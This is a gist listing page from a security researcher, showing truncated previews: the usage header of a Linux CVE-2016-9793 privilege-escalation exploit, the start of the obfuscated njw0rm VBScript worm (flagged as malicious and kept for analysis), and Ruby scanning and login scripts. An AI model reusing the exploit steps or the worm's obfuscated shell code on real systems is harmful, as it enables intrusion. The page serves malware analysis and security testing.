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nanotechz9l / CVE-2016-9793.c
Created May 21, 2017 13:33
Linux priv esc (CVE-2016-9793)
// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793
// No KASLR, SMEP or SMAP bypass included
// Affected kernels: 3.11 -> 4.8
// Tested in QEMU only
// Usage:
// # gcc -pthread exploit.c -o exploit
// # chown guest:guest exploit
// # setcap cap_net_admin+ep ./exploit
#!/usr/bin/env ruby
require '/root/Desktop/juniper_hash.rb';#require 'sugar'
# Parser script for Sweet tooth!
# DL juniper_hash.rb:
unless ARGV.length == 1
puts "Doh! - Missing arguments. A Juniper FW config file must be given as an ARGV! Correct usage below:"#.foreground(:yellow).bright
puts "\n#{$0} juniper_fw.conf\n"#.foreground(:white).bright
nanotechz9l / njw0rm (obfuscated vbScript)
Created October 2, 2013 18:55
THIS FILE IS MALICIOUS. DO NOT EXECUTE IT!!!!! For de-obfuscation efforts, and historical ref only.
on error resume next
dim puqjutqzym
'<[ coded bY njq8 ]>'
On Error Resume Next
dim yxbuwnkdhx ' shell
set yxbuwnkdhx =WScript.CreateObject( chrw(118-31) & "S" & chrw(cint(49+50)) & "r" & chrw(cint(25 * 4.2)) & chrw(cint(4928 / 44)) & "t" & chrw(cint(36+10)) & "S" & chrw(cint(104)) & chrw(2727 / 27) & chrw(4.32 * 25) & "l" )
dim dxlyfguatk ' filesystem
#!/usr/bin/env ruby
require 'rainbow/ext/string';require 'open-uri'
# Written by nanotechz9l
unless ARGV.length == 2
puts "\nMissing argument!".foreground(:red).bright.blink
puts "\nPerforming banner grabs on multiple hosts is tedious. Netcat does not save the typed input like HEAD / HTTP/1.0, and HTTP/1.1 200 OK for http headers for example.".foreground(:yellow).bright
puts "I can perform automated banner grabs on a given host. See example below!".foreground(:yellow).bright
puts "\nUsage: ".foreground(:white).bright + "#{$0} 80".foreground(:white).bright
nanotechz9l / rest_api.rb
Created March 5, 2014 23:25
This script automatically tests a REST API web service with/without user credentials via user supplied input.
#!/usr/bin/env ruby
require 'net/http'; require 'open-uri'; require 'base64'; require 'rainbow'; #require 'nokogiri'
# This script automatically tests a REST API web service with/without user credentials via user supplied input.
def banner()
print """
_____ ____
<----,\ -- )
nanotechz9l / ssh.rb
Last active August 29, 2015 13:56
#!/usr/bin/env ruby
require 'net/ssh' # more details:
require 'logger'
if not ARGV[2]
puts "\n[Auto SSH login by Rick Flores (@nanotechz9l)]"
puts "Missing arguments. Correct useage below:\n"
puts "#{$0} ip user pass"